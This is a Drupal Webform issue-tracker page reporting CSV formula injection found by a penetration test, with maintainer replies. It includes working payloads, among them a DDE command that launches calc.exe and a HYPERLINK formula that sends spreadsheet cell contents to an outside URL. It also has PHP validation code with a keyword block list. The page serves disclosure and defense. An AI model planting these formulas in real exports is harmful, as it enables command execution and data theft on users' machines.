Also known as CSV Injection, formula injection,

Attacker can store a malicious payload string in a text field in the application.

If the exported CSV file is opened in a spreadsheet application that interprets values as formulas (such as Microsoft Excel, Google Sheets, or LibreOffice Calc), the payload will run, usually executing attacker-controlled commands or exfiltrating data from the spreadsheet.

Steps to replicate the issue: (simple example demonstrating code execution)

  1. Create a webform
  2. Insert text area field
  3. Publish webform and navigate
  4. Insert to text area field: =cmd|'/C calc.exe'! ZO and submit the form
  5. Download the result csv file and open it in Micr*s*ft Excel on your local machine
  6. Results: Windows default calculator software is opened automatically

Other examples:

=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")
=DDE("cmd";"/C calc";"__DdeLink_60_870516294")

While a benign payload was used in this instance, other Windows’ commands may be used as part of a malicious payload. Common real-world attacks against vulnerabilities of this type include submitting an encoded PowerShell script which establishes a command-and-control connection to an attacker-controlled server, granting the attacker ongoing control of the victim’s computer.

An unauthenticated attacker on the Internet may be able to leverage this vulnerability to gain a foothold in a domain environment.

At present, the best defence strategy we are aware of is prefixing cells that start with ‘=’ , '+' or '-' with an apostrophe. This will ensure that the cell isn’t interpreted as a formula, and as a bonus in Microsoft Excel the apostrophe itself will not be displayed.

Solution suggestions: (implemented on my theme environment)


/**
 * HOOK_form_alte.
 */
function them_name_form_alter(&$form, $form_state, $form_id) {
  if ($form['#theme'][0] === 'webform_submission_form') {
    $form['#validate'][] = 'theme_name_webform_validate';
  }
}

/**
 * Validate Webform from CSV injection.
 */
function theme_name_webform_validate($form, &$form_state) {

  // Get the form fields array.
  $values = $form_state->getValues();
  // Fields to exclude from the security test.
  $exclude_keys = [
    'path',
    'submit',
    'honeypot_time',
    'form_build_id',
    'form_id',
    'op',
  ];
  // Suspicious string/chars in field value array list.
  $injection_keys = [
    'hyperlink',
    'cmd',
    'dde',
    '!',
    '|',
    '/',
    '\\',
    '‘',
    '\'',
    '“',
    '"',
    '=',
    '+',
    '-',
    '@',
  ];
  // Suspicious start of command pattern.
  $injection_startwith_patterns = '#^[\=\+\-\@]#i';

  foreach ($values as $key => $val) {

    // Filter only strings the not numeric.
    if ($val &&
      is_string($val) &&
      !is_numeric($val) &&
      !in_array($key, $exclude_keys)) {

      // Prepare value to inspect.
      $val_inspect = trim(strtolower($val));

      // Check if string is suspicious.
      if (!in_array($val, $injection_keys)) {

        // Check string start with injection element that may be potential harm.
        if (preg_match($injection_startwith_patterns, $val_inspect) === 1) {
          // Add apostrophe prepend to string to criple the command.
          // That ignored by Excel.
          $val_corrected = '\'' . $val;

          // Save the new value.
          $form_state->setValue($key, $val_corrected);
        }
      }
    }
  }
}

More info resources:
https://www.contextis.com/us/blog/comma-separated-vulnerabilities

Comments

gigimaor created an issue. See original summary.

gigimaor’s picture

gigimaor
må-or
Location Narangba/Brisbane
commented
Issue summary: View changes
gigimaor’s picture

gigimaor
må-or
Location Narangba/Brisbane
commented
Issue summary: View changes
jrockowitz’s picture

jrockowitz commented
Status: Active » Needs review
Related issues: +#2788591: Add warning about opening CSV files with spreadsheets

@see #2788591: Add warning about opening CSV files with spreadsheets

Spreadsheets are vulnerable to hidden formulas in CSV files. If webform data is submitted by untrusted users, and the submissions are downloaded in CSV format, maliciously-formatted submission data may be used to create a security vulnerability. The Drupal security team has concluded that this vulnerability does not rest in webform, but rather in the spreadsheets. Nonetheless, a warning about opening downloaded submissions in CSV format with spreadsheets should be added to the webform download page.

gigimaor’s picture

gigimaor
må-or
Location Narangba/Brisbane
commented

Hi Jacob.
Drupal version is 8.8.8.
I works for QLD, Australia government agency.
We hired a 3rd party security test agency to run a penetration test to our website.
The COMMA-SEPARATED VALUES INJECTION marked as high vulnerability security issue on that last test.
Governments are taking those recommendations very seriously, since they are an everyday potential targeted by hackers.
Many government agencies choose Drupal because of its high security policy. Drupal cannot be a gate to harm a local machines and domains, that operate mostly by non-technical users, specially when exporting a webform CSV results and open them on Microsoft Excel for further analysing.
Microsoft doing a good job securing Excel, but having a security message when opening a CSV that have million submissions is not a pretty view.

Do you thing issue can be solved in the Drupal core? At least mark potential harm submissions for exclusions from exporting to CSV file?

jrockowitz’s picture

jrockowitz commented

Organizations can disable the CSV export options via /admin/structure/webform/config/exporters

This discussion needs to be moved over the security team who will have more insight on how to best handle this issue.

jrockowitz’s picture

jrockowitz commented
Status: Needs review » Closed (outdated)